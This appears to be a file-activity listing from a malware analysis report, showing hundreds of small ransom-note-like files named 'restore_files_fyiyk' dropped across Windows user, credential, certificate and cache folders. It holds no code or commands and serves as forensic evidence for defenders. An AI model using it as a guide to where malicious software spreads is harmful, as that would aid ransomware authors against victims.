    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (13880 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Templates\wordpfct.wpd (892 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Templates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\winword.doc (426 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js (860 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\VMware\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Templates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\NetHood\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\My Music\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\AU\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\GHISLER\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Games\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    C:\totalcmd\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Start Menu\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (1225 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Cookies\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
    C:\totalcmd\KEYBOARD.TXT (436 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\excel4.xls (419 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Recent\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\SendTo\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Favorites\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\VMware\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\PrintHood\restore_files_fyiyk.html (5 bytes)
    C:\RECYCLER\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Wireshark\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\My Playlists\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\NetHood\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\UserData\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\My Documents\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Favorites\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.html (5 bytes)
    C:\System Volume Information\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Templates\powerpnt.ppt (454 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\My Music\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt (250 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
    C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Desktop\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Favorites\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Desktop\restore_files_fyiyk.html (5 bytes)
